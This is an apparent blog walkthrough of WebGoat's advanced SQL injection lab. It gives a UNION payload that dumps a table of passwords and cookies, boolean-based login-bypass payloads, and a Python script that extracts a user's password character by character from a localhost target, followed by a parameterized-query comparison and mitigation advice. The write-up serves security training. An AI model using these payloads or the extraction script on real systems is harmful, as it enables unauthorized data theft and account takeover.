In this walkthrough, we will go through the SQL Injection (Advanced) vulnerability section of the WebGoat labs. We will explore and exploit advanced SQL injection and learn how applications are affected by it. So, let's get started with the hacking without any delay.
1. Pulling data from other tables
- In this challenge, we will use a SQL injection payload to dump all the data from the tables.
- I used the payload below to dump another table from the DB.
Smith' UNION SELECT userid, user_name, password, cookie, null, null, null FROM user_system_data; -- -
2. Login Bypass
- In this challenge, we have to bypass authentication and log in as Tom.
- On every failed attempt, the application only shows a generic error message.
- I tried the payload below in the user registration functionality and got a "user already exists" message. That means the field is vulnerable to SQL injection, as it executed our query in the background and reported a true condition.
tom' AND '1'='1
- Next, we tested whether the user's password starts with the letter t, and the application again confirmed it with a TRUE response.
tom' AND substring(password,1,1)='t
- After this point, I also tried sqlmap, but had no luck. So I used the script below to brute-force the password manually, one character at a time, using the payload above and the true/false responses.

```python
import json
import requests


def sql_injection_advance_5():
    alphabet_index = 0
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    password_index = 0
    password = ''
    # Replace with the JSESSIONID of your own logged-in WebGoat session.
    headers = {
        'Cookie': "JSESSIONID=5g5R4McsS89BVEPZyyuVpS_dOatOzBFP6Jy6qDa8"
    }
    while True:
        # Boolean-based probe: true only if the character at the current
        # position of tom's password equals the guessed letter.
        payload = 'tom\' AND substring(password,{},1)=\'{}'.format(
            password_index + 1, alphabet[alphabet_index])
        data = {
            'username_reg': payload,
            'email_reg': 'a@a',
            'password_reg': 'a',
            'confirm_password_reg': 'a'
        }
        r = requests.put('http://localhost/WebGoat/SqlInjectionAdvanced/challenge',
                         headers=headers, data=data)
        try:
            response = json.loads(r.text)
        except ValueError:
            print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
            return
        # "already exists" means the injected condition evaluated to TRUE.
        if "already exists please try to register with a different username" not in response["feedback"]:
            alphabet_index += 1
            if alphabet_index > len(alphabet) - 1:
                # No letter matched: the password has no more characters.
                return
        else:
            password += alphabet[alphabet_index]
            print(password)
            alphabet_index = 0
            password_index += 1


sql_injection_advance_5()
```
- Got the password and logged in to complete the challenge.
thisisasecretfortomonly
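To see from the defender's side why the registration check leaks the password one character at a time, here is an added example (not WebGoat's code) that rebuilds the "username already exists" lookup against a constructed in-memory SQLite table, once with string concatenation and once as a parameterized query, and feeds both the same boolean probe used above. The table name, columns and sample rows are assumptions; SQLite spells the function `substr` where HSQLDB accepts `substring`.

```python
import sqlite3

# Constructed sample rows standing in for the lesson's user table (not the real schema).
SAMPLE_USERS = [("tom", "thisisasecretfortomonly"), ("alice", "hunter22")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE challenge_users (userid TEXT, password TEXT)")
    conn.executemany("INSERT INTO challenge_users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def username_taken_vulnerable(conn, username):
    # The flaw behind the challenge: the username is concatenated into the SQL text,
    # so a quote in the input turns data into query logic.
    sql = "SELECT userid FROM challenge_users WHERE userid = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def username_taken_safe(conn, username):
    # Parameterized query: the driver passes the input as a value, never as SQL,
    # so the whole payload is compared literally against userid.
    sql = "SELECT userid FROM challenge_users WHERE userid = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def oracle_answer(check, conn, position, guess):
    # Build the page's probe for one position/letter and return what the check says.
    payload = "tom' AND substr(password,{},1)='{}".format(position, guess)
    return check(conn, payload)


def compare():
    # For the first character, ask both implementations whether it is 's' or 't'.
    # The concatenated version answers differently per guess (it leaks);
    # the parameterized version says "not taken" no matter what is guessed.
    conn = make_db()
    leaky = [oracle_answer(username_taken_vulnerable, conn, 1, c) for c in "st"]
    safe = [oracle_answer(username_taken_safe, conn, 1, c) for c in "st"]
    return leaky, safe  # returns ([False, True], [False, False])


if __name__ == "__main__":
    print(compare())
```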
3. The Quiz
Conclusion:
So, we finally completed the WebGoat SQL Injection (Advanced) vulnerability section. These attacks can be mitigated by validating input and by using prepared statements or parameterized queries for every SQL query the application sends to the database, so that user input is always passed as data and never spliced into the query text. On that note, I will take your leave and will meet you in the next one with another WebGoat vulnerability writeup, till then "Keep Hacking".